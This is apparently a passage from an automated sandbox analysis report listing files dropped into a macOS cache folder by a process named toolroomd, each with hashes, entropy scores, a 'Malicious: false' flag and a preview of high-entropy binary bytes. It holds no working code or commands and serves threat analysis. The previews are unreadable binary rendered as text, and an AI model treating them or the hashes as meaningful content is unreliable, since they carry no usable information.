/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.1E9FF711-76C5-4137-B149-FD9402308D60.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	32395
Entropy (8bit):	7.669466990009793
Encrypted:	false
SSDEEP:	768:G9IfaLdb0gF/zjA/qxb0nDqtHm2lMaEYn:GSfaLdwaLjgqxwW7CaEYn
MD5:	F361339819DC3B6D8957D14B4A25CFB1
SHA1:	8D2081470518764089C28ADC76CB1767B8C64EBB
SHA-256:	685ADF3928674BD2E370C938D82A9680799BE661436573848ADEB2E618F7E3A1
SHA-512:	5E21B05E40D66A48115F838039878C9D80B05E0A06230497A8FF5D60D408EA938CD8AD260AE01B2A194225F99BAB7AE5DF4A842CDB7BDCED6F3B57ECC0B09223
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.Q...Q..dAC.WL.-Q]...i,...J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%..K:.N.ID.tB...\.....'n..DVt....4.=P...V...h...#.....v..O.....)k.}..>5I-.g.....l..,y..\|..hkc.#A.\|t.....S!......,.....c.;.A[c.......5..m.......G...i...:.6/.a./.....2..A.@!,....{.."..;.t5^......jd... ....-P.[.l...3}3...u..P.....^..p...r%...V..br....\...x@[.$;..?.....y.....ilBI..>s.{...u..N4..I...D..q....=.5..B..D..-Z..r.s....G.z....dh...<..!..H.Z..%.TE..G;1!...Ms..O...h..Nkc.#A.\|t.2..........,.....c.;......Vy..,.9-7.........g.NSA.QK...s....G.z....dh...<..!..H.Z..%..m...[.R...7.,..ha.1..E?/.a./....A-..W.!,....{.."..;.t5ha.1..E?..D.0.;...K..t{..p..,9P...Z...M..{..cr.R...i-.%.cI[.....'n.w.t.f....3....E....h...#"v}O.:~n.O......9../..M.N".r%..Z<.3....b...6=...X. .C.d..V.!^..W .=....`..y[bg./..3.w.......&..j.I=...m..'V+.*74.rJ.#.\...6<.."a.....q.A"&...q.A"&...q.A"&

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.272F131E-17D0-41E8-8C43-CFC72112DE29.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	68982
Entropy (8bit):	7.810283742033086
Encrypted:	false
SSDEEP:	1536:Gp+PgUOIqVxBhnwa8gT+h8MsJZNnsqyzIXgm4XiFCN3:Gp+PgUOIqVxUNh8MsJZNn9yzIQFN3
MD5:	EA32862448BADFCE5070E56AB5895DC4
SHA1:	7010456547298D8515847A7AA5A22A51B232754F
SHA-256:	7E2CA809BD0547DB59DDA2D78F60C54479557B57B4913ED536DC92EDA9491107
SHA-512:	1BB1F00614F16C1BA2869B46C8E8435B937F7F3C9F2AF6664A978422983E26DDCEAC95729533FA632FF22C672C2BCBEBC8F14202F415C4A0D74CE3E42C303893
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:......Wu3;..B.....>t.....j.k.P./.I....CJ.aF}A.s.!..,A...U..D!,....{.;%-s...y..v..ry..^...2...b....}.+..+!{...r.~R.6..M..2...x.C.RsrY5p.yih...."..1.......+...../.a./...A...U..D!,....{.;%-s...y.........^...2..Y.....]...0..L....r.~R.6..M..2...x.C.R...M...W..l...c1.....J2aD../.a./...A...U..D!,....{.;%-s...y4...>3...^...2...y.....Q..x..:o...r.~R.6..M..2...x.C.R...lpL.f<n"\|..@.{.)w.}.r.f.7..S....\.. Z...P?.P.....^..p...r%.>..D...%}m....{...M.J.!b.:.........}......h...#.....v..O.........J.."&..f.~.8..........Y+.ou.^N...<..>s.{...u..N4......@{9[)#:[o.g.$...=...sx.{..p..,9.....A....M..{..8..i?s...`S.z@...{.)w.}...k[....Zc....T Z...P?.P.....^..p...r%.._..#/.Zz.b1k..G.g.$...=s.hO..U.{..p..,9.....A.......X8..i?s...&...^..1......G.r.,6d/.a./...A...U..D!,....{.;%-s...yF.d.....^...2..1..T...[..W..6>...r.~R.6..M..2...x.C.R.G..C+\....^.X..1.........4...

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.2A345237-F669-451B-8016-B4A12B1A0E85.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	15706
Entropy (8bit):	7.95303162091518
Encrypted:	false
SSDEEP:	384:gZo0SvqT9z4z1cpoMZVnvu4pligsPj3HiR:Wksz4R2vvvl3mjI
MD5:	5588293BEE2EDCFBE011FE85BBF3B3FE
SHA1:	8A93779DC079FECC9EE2EFA428427592445C669F
SHA-256:	1836634674098D8B328D4AA6773E53F88F35BFF236A721FDDB0E5537C851F922
SHA-512:	D9C574C7DCF0A720359D2D9A6C1CCF9A403F8437B677ABD09C53ECB6CEE793CFE245010F78F7784953BA1790CD58950B61B29FADFBD1356F9988AC9AFB580791
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..WF.[.@.......[.......~.I......&.U#..)......!......m....../...[.. ."4g....[...1J.JgB....../.......y.6.l.8.9 .<...f.9...."...Nx......n.P.4)PT...s.?)..W..[G......#..w.,a.Z....\.R.l.(\z.J......."P.6..I[....T...).[d....'L.hHe"...;N..S...eQp.):.....r....i..G..h.'.H<...5 .=2D.. .Z.}..Qr.B.y....@L"K...F...N'.;..F....}.3\......)Ro.pL.W....3..=#.0]B@n^UP.."zC.>.-....n...Hm~...;.._....k..T.J..](F..E.kX.....3.F.!.G....)........ .E.6g.....U./^9.,..Q.l...z.]..V.>....M\|...&..}.}Q.t..i.B.0N.\|.....5.P...L3+.........8.h..@0...1.}!..}..b..s..)=7..lD>o.e.M.V....\.Ir04;...e....D..9..a.(..a.w\|B.\u........K.xH.l..A.w...#..6.J....-.'.x.h..&....YJ...a.....qH.h...U."E.q..S...}.0...S........NL}..HN.U.5...'9h....'..BK.q.g..+.2..V.i>3...6hx l/..U8=....2}...fZK....\|Z^=....\.S`.=k2..{.W../..]..p..H..1&F....<...d..[.X...=b.ks....e.j.}....._..a....a.f.".&[.s.r......I../....OlL.......o.../[..T.>X.a.&~....d..w.F.6......m.W.l.4$..n...d..\.L..q:0.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.2F702D30-45E9-445C-B3F5-72A70D2A9916.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	153219
Entropy (8bit):	7.941991406218959
Encrypted:	false
SSDEEP:	3072:GKnojlfmVSDzAD3zE6GO59JOj0uIiLY3V0xqKf2v4xurK:h0lfmVSDzAD3w6d20ui0xqKIKuu
MD5:	C2551AE037011FA3AB2687D674FFE135
SHA1:	8557E427C7A4B11D26630141E4C72A4F3DB966C8
SHA-256:	30E4022F4E82F0C37B817C2BADF64999EAF970192235E29DCAF29A77D74CDECA
SHA-512:	C2AC5A01E60687991AA657EAAEB5AD9689E2479CB7CB56329921406429BE28AB282334203A13D030DAF407C6864A2190339687E05C51E359D2777FD07A6F6951
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.!..n7<u.JL..g...m..........j.k.P./.I....CJ.aF}A.s.!..,A...U..D!,....{..5p..O.f.qWkn..=.s...3...kI.c.kc.#A.\|t.2..........,.....c.;...}.>.M.O..$....v.A.B..p..(Y.....:..+.....v..O......@..x'.n..5M....O.....I...J%..X..@Y.......v..O.....a. .E6......s......E.8PR.h.S.#.kc.#A.\|t...tA>.......,.....c.;.....E.8PR.h.S.#..=.s...3...,P..xkc.#A.\|t.2..........,.....c.;.j....Y.7.f..hF.'P.!...!..3....E....:..+.....v..O......~.>~E..>9.. +..1X.yD6n..U....^.1..\|.b..........p...r%.......$.y/A..6.c!.o{.s.(...z..B..z.R.6..M..2...x.C.R..@..U).q6.u.+.r..4.M....8.a...`....$.z....dh...<..!..T...0.}....).../*..b.R.]...q)\|u.^N...<..>s.{...u..N4.J+N...a...^.x..6..t..,.8..B.X......dCD...h...#.....v..O.....:nr.o..v...`!..X._W...}^.....u.^N...<..>s.{...u..N4.&.+.;..q.@.e.1.....[.[.p.E..n.c{..p..,9.....A....M..{... ..t....u...S.......7....d._...@6... Z...P?.P.....^.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.30534F7C-12F4-4591-BB02-EC61EB7DB850.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	32059
Entropy (8bit):	7.688523216628986
Encrypted:	false
SSDEEP:	384:JorT3a3d9wU4cCwOnIygdr0oDDz5EBJ4MiGqC1EViO/LAXox2yFhR6Bk2:GrTed9w/cAnIymAoD3+J4s2LaS36BL
MD5:	08535FC161EE47265B16A8F811A8993B
SHA1:	758DD5BDC87DD33BF79454D327B8977E33886B91
SHA-256:	D945AC369D8CB2186AB9FE4771040F043C1F9D66281050E9E87416A36345EB1D
SHA-512:	C4917D1B9D40863393C69A6F1C15A2A957CA5161A187B73293D6361D26DBB41C0CF40ECEE4E24C03B36AC725B4337F1191A4F5E24CE5ABD0220F129A2B93AF8F
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.,.qH.....>.#...).R.n...J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%..X..^N..(c..bV....z..j..T.9n.[?.Xh2...0...h...#.....v..O.......P....I..T..p..1..e{..m.*...C6kc.#A.\|t.....S!......,.....c.;.2..L^.R;.[Uo..#.3,...?.U..8..b/.a./.....2..A.@!,....{.<q....[z&...........2.M.?.B..1...>{..p..,9.n..Dr..M..{..?..<.1w........-T.k.N.\.....3..YJK.......ilBI..>s.{...u..N4_.x.D.'3...aF..2O.&.)..B.I...+.(.Ov.....s....G.z....dh...<..!.O.....p..M...........>f....J.M.A`...R....M.O..P.....^..p...r%.U..%uV.....b`..io..$.....v.....kc.#A.\|t.....S!......,.....c.;......f.....@....h....>f.p..x:p/.a./.....2..A.@!,....{.<q....T6.....8R......b.w...'.....jF{..p..,9.n..Dr..M..{..?..<.1FX....4.7#.o..3....'e...(1.\.......\|%"...J..%....c.!._qlA....x.....Y...t......0.g%.},..eJ....m....8..pv.;J.B.:...q.A"&...q.A"&.S.?r.F.h.]J."...>..K.......2B..m....L.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.3A871320-D3DC-4473-9CCB-8155D9A348EC.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	6834
Entropy (8bit):	7.912261828952289
Encrypted:	false
SSDEEP:	192:0kTGVrnRvM4kpiP5XmM5xGX2vj86B8AcTa1:MVShpa5XmM5xVvjf8AcTa1
MD5:	C917123A9BA7B36C4EDF8BF4B7CD9064
SHA1:	3DADCF0DFEE64D0285F94264CDA27572DC7DE2AB
SHA-256:	EB5B65B44CF54A45A265348B7939C7E789BA3010B6422C18290F6D40785A7C92
SHA-512:	8BD5723316D5315533A47A8EE6795C06D8AECAE9974801FD748859E845CF77EDE0135CD62CAA4EC0C4835EB073D2301E11EDC7DED7D966119F6D2E57C133CAF5
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W...7......HW_..B..x........(.k....I!......!......m..........GA..5.7.j.%S...BW.zc......kf..^.,.{......0......9p.0..[....XM..%.P@.x.c.$r....5I_.~.y.......<..G......BU.p..U....X.Z0.)..f2....".6q^4N.u.#T.9..L .n..'.....W.,zP..G.+-'....x`.@..................Kh.y..H..X....A._lYD..t....,aW]m.m.BJd.9.)..5.....%C...y{k..!e....%P.........'..5 .=2D.;...7......2,...fZK...x.i.....0R.D._...1........V.....].....:^..<..xo...K.R..Im..Y.l..c.Xg(Ur....7...g.....j.F.!..].<...T..us.y.J..Ml.SA^...tM).RG?...O..]..T.#.F......)."....%..7....:...!X.........}...U..>NaK..vM.0.%..g...."nz...l....xr.........7....m.r..i......u.....K..P.fAT.J....5.}:0.K...L}\.>...GI.0..!...7....:...C...y\|(.U."E.q..S...}.0...S........NL}..HN.U..$...(....'..BK.q.g..+.2..V.i>3...6hx l/..U8=W\..\LX..fZK....\|Z^=......Y....2..{.W..Z.g...>.H..1&F....<...d..[.X...=b.ks....e.j.}.u.q...ws&...w...@s...X......"....R..B....P.A,...#9...>.....]....O...a....Q.% ....G!%.....

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.3D530EC5-BAEE-4741-9211-6ADBB71586BA.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	39268
Entropy (8bit):	7.56640051017446
Encrypted:	false
SSDEEP:	768:GMKLH8M5us9Wi1N6jkGUNPdjkG+7Xt2O4Kl:GMoas96Ab1jD7G
MD5:	C4533A3C9F24395773C4DCE36C86C3DC
SHA1:	DE5CC75CA15F4C18CFB9CE767AE2633B701C0885
SHA-256:	E3ECCB2F7D31D4536DAE4BD670F9239D232685F8BFA8340C1694BD4E22E0E3CD
SHA-512:	9756041C561B9AC0688DF459A74E51414DCF37DA6A77D407457DBBF87423AC2ACBA0F210E0876F83683C870C7E376460B5742E1A5507AD31A240BE949CB5387D
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.,D......".."..b........O..(.6I...>.F.=.u..['2..SHIPC. ...p.....v..O......!.V.....tO..z$.i.Y......^...U./.a./.....2..A.@!,....{.;%-s...y.E4(e..n.h......'V6.OG...7E..j...B13...>s.{...u..N4.f...w......uj.%..3.^D$.....N..gcL/j...M.O..P.....^..p...r%....X.v.....D<.d.v....\.4....kc.#A.\|t.....S!......,.....c.;..U.;.B..l....<.l...G..T....Z.<I{..p..,9y...<..<..M..{.........>......Co.%.............8W..s....G.z....dh...<..!.u.Nf.B...,/(-..^...2...dhY..P..H.y.....r.~R.6..M..2...x.C.R.Q..O...<..yn.%..wZ.`...{..s......}...C. ...p.....v..O......!.V...,...5.....G..T..{.:..{..p..,9y...<..<..M..{........{..s......[..!TD..9....G."...=.P.n..i.6..M..2...x.C.R..x.{.>./CI<..M...s.....[$..f.N-o.......h...#.....v..O......!.V....D...L..<.d.v....R+L....kc.#A.\|t.....S!......,.....c.;..K@..5....I/...~.k!..G{...H. ......*,....j.k..Y3."...s]...

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.41CD3BED-AD86-43C8-8290-031AB71A920C.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	22411
Entropy (8bit):	7.95769217239297
Encrypted:	false
SSDEEP:	384:LqlUlkAyFcg2Vsi5n+gnhSipJ97cPY5h65TnDO5zEwk6Xh:ulMkR+g2ai5AS/7anDO5ww/h
MD5:	13629D0A37E5B4063489778A99807A9F
SHA1:	9DE96BFCE801FEE041D970BCB11540B202F36172
SHA-256:	8C2C245F797510782F92326BF25F28AA31301E91FFC46DE83865D8CF45D6A7ED
SHA-512:	5BB78191F701425E69F3569FFEB7712D4C30169B3CBD11E1DFBEF2BCEFBF9A4EBB82D19BC313F22CEF48489798D69DFCF2ECF3A1A413D8149963DD331B2084C2
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W-.u.K..l.l...;..S@...x..0E.8;X..ji...H.......!......m..........q. ..L...b...fTE.eK..vM.0.... G.k...V.<...Q.= =..Ir04;..4.b.<....x..xHq...R..,.....idD...>.=...q."..`...{%Di.....i..AQ.....M..C._..I7{..r.G.m</,...g.Kj..9...7...8.....j.<.dj.....N.Og.8..n.%..5W....\.T..DfRQ.$.'.x.w..[3.`.K.Z....kE..S/..}D...q)Go.Z.tI4r.#..^+[g.].Ut$4..<q...:>\|c...$..;.j.#l....:..a`b...../.V.o.pL.W...L.?..n..rY.3.I2..C.X.....aQ..(..........%.....4t...i.d..S.?..K.,.h.RZ.].RsQ.......R@K.....Rq...j..U..Fc..\-....a=......L7...O..?..z..V......3Q{.. ...Bv.J.......G.oU.F.w.n{.."nz...l.c.!<....=....@Z..L.Z.4k.v.....i..._.f$.n.S..>.j.R0....Q.R..N.C..y....1.sP]...Gq.b......\|.?...?a.hMb.rm<".......'..5 .=2D.O".i@v.i.[M.\@Lp}rSx...x.i.....0R.D._...A._lYO.05..}E.....s>.....#.X.L......5.3....v.. .].O1..q...T..O#l#p..\|7G,.2.].v:.t.^.#.3..2.......@1]}..N.d.....s\hd.y..%.dD.y...X5..;..k.u;....@......vo....).z/...k......VR$.%.y.o\|Z#s...j.d.Q.x8$.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.434349F7-87F1-4514-B525-A51E992340F3.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	34740
Entropy (8bit):	7.609921309590393
Encrypted:	false
SSDEEP:	384:JoqBkfG9ws8+hJHhGiCvT7YWpZ5DDfC/W+DtjliHVMpDbBTSiqplqWeoFITblpXs:GpGl8uJ8Tr7YWqjlVpDlTSiqpfKntW
MD5:	7AFE9DC04A3BC2CF79D24B0F966DF2B1
SHA1:	A44884F8EFE26B23E6D934946E68CD0D8F8C04CC
SHA-256:	8F48538ABAE9026EC773FB24001A6BD15651D1C5C00E772AAA266DC1FB78056B
SHA-512:	CE418E147F5D2E8043CB09805583490531F5778C680425CC29922D6070CF94FAD8FF015694AD1B48FBABDFFFD7BF5BDEF31A92958AC15C0B48F7046024D4E78D
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.Q...Q..d.$e..0m.2o..m<4z.J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%..G.(..,....[..}...41q.TU....Gf..Xh2...0...h...#.....v..O...../.wr.@.A8..e..9,....@..e.7..-.. kc.#A.\|t.....S!......,.....c.;..]......^.N.Wr7J.......'...o./.a./.....2..A.@!,....{..5p..O..>.!!'.....J....6....h...gqZ...{..p..,9.n..Dr..M..{...G.5&g.4.]..m.<.L..A......{.;\..c.......ilBI..>s.{...u..N4....G...~.S.....=.d..<C.U..@h.kT...t...s....G.z....dh...<..!..d.nY.r..........Q../.k............\.....r.~R.6..M..2...x.C.R...D.7..:....E...8....z....."ya.t.l{d.N. Z...P?.P.....^..p...r%.BG$.I..D.d..F~M..41q.TU....1....R........h...#.....v..O.....8.9../..UE...0.i%.v..k..V~..kc.#A.\|t.....S!......,.....c.;.....DY+{.@....WiU...i.2Q.c.\)../.a./.....2..A.@!,....{..5p..O.P......Q.v.v.&%.G.!A.S.9.H\|.xv.......TJ.k.S...1..^..#.....S..XY.X..2.].....J.y....,w.\|..T...(...g.&;.rW\|8>

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.48594D12-72CE-48ED-8D80-E440D08845AF.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	17123
Entropy (8bit):	7.9593621699894745
Encrypted:	false
SSDEEP:	192:CL4KQBHdieAzcptp6ILwkW2kWVp4bFkA3UyrWha1IcGFloCAcT/juUXDW0kdHhGS:/Ie0SphkLiATolT1t3kunOKu9u2
MD5:	034B5F3EC7CC78AA69D255B35FF281C4
SHA1:	D6F5D7CA5B2B0186282275B24B3B134E1795BFC6
SHA-256:	782E5908E1285F809DD1ED7F4711C739CCAA7E47311DBE15C3DA9F62E236F94E
SHA-512:	CDA4B9A107E6F1B5A1572760351F1902399D7C0A893924B6FF986B90511FFB901EC1DEB28F49A6B43598B4779AED5C0E4FA5C149156D3A881F859E8582CC44E7
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W.B .N.._Ra....9....6.^m....m..2......!......m.....M.%./.>........ka.S.^..9..........Q&..?..$V-..1.!pFq.VL....y..... G.k..XqRL"R.Q......}`.._..Yi.NDG..^1W'...gG.\|k.w...\6O....ei.p,..b...&...._.......1..SKl>....VT..[.F....\L..zF.......T...6....A.j\| ..z..y._Sw.]...$....wP.Y..D..6.N...fg<...6B.~.....g<..'/=..0ou..qTS....:R.(.....c.A....;e........"........!EJ.w..5.46..Y.....[6....7u......".`"e!.......J...K.Z..l.....&../R.H....................h..Mu....5I..9iT...`...Kmg..#..`..}..77.#..E4.....K..cN._w.L.'E]..~..v-..+...'......2=..d.v....lD>o.e.M.V....\.Ir04;............@......EB^J4..9\..R....15,S}h.H.0.)..=7...+M..0%..5..~..s.h....b[1........DFn.]<.7..k..=. (.z.W....U."E.q..S...}.0...S..W.7..+...-B..,.8b.f.3..K.Z..lBK.q.g..+.2..V.iR..1...id..g...c....Fn.(.~4 j.\|Z^=....\.S`.=k2..{.W..Z.g...>.H..1&F....<...d..[.X...=b.ks....e.j.}.....P7.....\|G...7.H....qb..E#. m2..C....n....P]..T...c+B4..WT.-..C.....\|.q..

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.4FEE0CA6-CA85-4946-B181-6D05108857F0.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	45908
Entropy (8bit):	7.7360359219219035
Encrypted:	false
SSDEEP:	768:Gcleu+JqM6CA5tqUAh5D8ZzXcJCsOd4O3BsYav1UeUY7fqKG7fqo6xlyZFuKIrh2:G5u+JqM3A5tqUAh5D8ZzXIFOd4O32Ya0
MD5:	4E561F35004E229E03D5EF4E87948E7C
SHA1:	C9F26322A0C7613D76B03B16549520E4199EE37E
SHA-256:	9AD13480D770E70550C668E21D41082CD3BA5D619CBA889142FB6D254CFD4056
SHA-512:	914018A5A5B74361044199FD5178312DB59C786C8822573A5E2CD3DFEBEEE165A52C167036E09A0533BDD196D41E023A4080FE5C366F4860EAFA585361403F94
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:..l....:3.N..,..UR....x.o.....I.....J..7..=.'..OV.c..$k.R...0.....,.....c.;....SF.e....q...N..,..^X......5.RK..6..M..2...x.C.R.fS..N.Y.....u. ..1.[.9."ZN.7}I{..p..,9r........M..{...@.{......A..v.B.E}%.e.o....r..0..g...M.3z.W.....v..O.....Q }..:...H;T.....P>.~...PO.........P.z....dh...<..!.../..!j.Q..y..)...i....`.X..y....xI...g...P.....^..p...r%.&..w.,U..;..N............. .D..kc.#A.\|t$k.R...0.....,.....c.;.cI..{....=..V..z.f.s...<...y..j.b3.....z....dh...<..!.../..!j.....n.P..........W...&67kc.#A.\|t$k.R...0.....,.....c.;.cI..{.....}}..&.N..,.5<l.{>.C..5.RK..6..M..2...x.C.R.fS..N.Y...F=9...ol.....X.##[nI./.a./....A..MmI.!,....{.]...&.p...j.."aC.....d..N..,...P.#V...5.RK..6..M..2.....c...fS..N.Y..,l.a.. ..1.[.9w\.....{..p..,9r........M..{...@.{...........B.E}%.eQ_..^.4.$.4EV.B...M.3z.W.....v..O.....Q }..:........?..r..s)Mr.h....+.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.5474A8D2-0EAF-45C2-B6F2-E1269E28AEEB.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	59677
Entropy (8bit):	7.694285150774478
Encrypted:	false
SSDEEP:	1536:GpNKgcfspFm7gS9z9+Hx1UFQXWckwx9qg:GpIxeUMSAiwx9qg
MD5:	E348CC22884CDA5AF8BDB9C0E5DD37C2
SHA1:	1AF2644A92662437A281772664693F41622B5D9C
SHA-256:	72239763831B7EEE022F5AB27A5F74CC1AF72C070D097EEBADC6F537BA1D78A0
SHA-512:	67177245B5F5E5813FE2753E95396936032FDC2B5FFF25C80EF46360655A373D970AB8CE268205AA56886FF45C8E59727070B2A08DD3B8B5E8BCB9B497B6FD7F
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:...7Z...H...w....o:Ew3.7v.J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.n:...d...%..3.u.>.mX.;...lS*...q$.4EV.B....h...#.....v..O.....)....#....c3\54.........E..\ ...{..p..,9r........M..{.._..{..J....J..p.......t..Ke.....:.u...9...r.~R.6..M..2...x.C.R=l<...u.../....<c>.e..M....I..1!.@7..... Z...P?.P.....^..p...r%....H..['.&a..u.>.mX.;.....0.>UXh2...0...h...#.....v..O......-&....(._.&..Y...3......?>.u.^N...<..>s.{...u..N4..`.=JV.....}.d>.mX.;....._..\|.G.....M...h...#.....v..O........xW.Pxa1...N..a#8........._a.kc.#A.\|t.....S!......,.....c.;.-.I.N......F.op....."i.T\.v./.a./.....2..A.@!,....{.j=/.2`V..t.....J.<.#-..~.ht.Z...D.....u{..p..,9.n..Dr..M..{.._..{..J..%^..iD...v.[.j=P......e...RVw...5.RK..6..M..2...x.C.R.'T.~V.o../1....a#8.....8.L.kc.#A.\|t.....S!......,.....c.;.T~.b+].xV.ty.d7$..../A.v. .../.a./.....2..A.@!,....{.j=/.2`V.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.593D04E5-7B81-43EB-B5C5-297A4A6AC5D3.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	37524
Entropy (8bit):	7.597865164443123
Encrypted:	false
SSDEEP:	768:GlI3Hf2JgPunQqShXacLXc/mSUtCzyZOn2usUyeSS4n:GluHuhnQqShXays+S6vDUyI4n
MD5:	9002FC62BEEFFC25B50B437883134EDF
SHA1:	7F98982183347F1352640F9C7FAD212DCA769C0A
SHA-256:	645D164623AFBCE84EC1255FA265643F33E24C767EE463D761506E3AFA511DAE
SHA-512:	B97029C99552D9582136A5098A932EA42413FB7C8B34598831D35A18559E2C31649530D86E67B3585AD2D857EAE859865BB74719F48F342C3283294F9A701607
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.,.qH....j....h..i...S.J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%...b......../..).n.x.fk.....i...G.....M...h...#.....v..O.....;..Gc......."-....x....5l...J..kc.#A.\|t.....S!......,.....c.;....P....}!...V.LR`..\.@........./.a./.....2..A.@!,....{...+...pxI.rI..vZ..5.a....?"..X....9d.{..p..,9.n..Dr..M..{..N.........%.8_.LG....._....yC.....\|/c....ilBI..>s.{...u..N4..+.&.-.....i...I..mYq.,....J?.].....s....G.z....dh...<..!...6..5.I."e..i...J&...l<(...k....;\.:.c....r.~R.6..M..2...x.C.R....1...K.vpN.s.6.....h..:....g".R..; Z...P?.P.....^..p...r%...;{.?.U.......n.x.fk..,.........R........h...#.....v..O........c.i.?..;C..q...x....&..6)..kc.#A.\|t.....S!......,.....c.;.....y.{%.....x...../9.{...H. ......*,....j.k..Y3."...s]...%..zXL.~..+.i&..:y..'0.4........p..3R...z.M4..g3SX.!.`...q.A"&...q.A"&/.<.8.....D.]....h'...vM..j..<.V.J...

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.5D9D3739-0751-4BC2-BBEC-5F9F5EB9E750.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	60733
Entropy (8bit):	7.797732185760945
Encrypted:	false
SSDEEP:	768:GAv7l72NMU3J7CWtGr0qGduR3VimCvqycQpbngaYGYfXj+RaPkreLNEDAK2Sct:GAv7l7O3Jmhr0DMCL4XVP+w3K2z
MD5:	04CDECB962B427133BE89396372F5527
SHA1:	BA749892EE0D4C9AD2FF0069820FC4B485654E7D
SHA-256:	9951655B44BCDB3CA98F030DFFBD1F8E7C36E103F3D3B26C5D6CE579509A4E13
SHA-512:	0F167EF56D2EE71A554A6806844C6099DBF782F545151929F594152219FEBF89424C100E0EE10DA461BA8AE8CE909A8C0BCDFAA4C62BA82DD69DAD0D80522502
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.5.k.....x.3...."I.r u...J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.!f...z.B<.wtE.h].f.5.[.....[..&....V.:.....h...#.....v..O......_..&.`...hvy}.k7....."......+kc.#A.\|t.....S!......,.....c.;...u..\|.......uo....8...J.Hy../.a./.....2..A.@!,....{.....q.qi.<..uq\|i....".<w}\,D$j.....~"..z{..p..,9.n..Dr..M..{........<zt]....ir..E.0...o.....TK......ilBI..>s.{...u..N4U.9..`,...y..&.$.brd..'.jw......0r.V...P.n..i.6..M..2...x.C.R....t......`ix(....v.a..k8X.${..p..,9.....A....M..{........?.5M^.lK<....Q...%m.k{..p..,9P...Z...M..{...............f.5.[..;.<4....."....1...h...#.....v..O......d.).l.......;[.!0"...H..}.0..kc.#A.\|t.....S!......,.....c.;....Lp......S.xl...H.../....I.2#....C.l...2..A.@!,....{.....q.qi..._P...B...o[Y(.{+....;'b..t*.{..p..,9.n..Dr..M..{..G`.d..@Q.....i.L..LD..".!.........XOg....ilBI..>s.{...u..N4...:.o..

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.60700780-5972-4FC5-A382-B11854280CD2.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	25443
Entropy (8bit):	7.318271373402448
Encrypted:	false
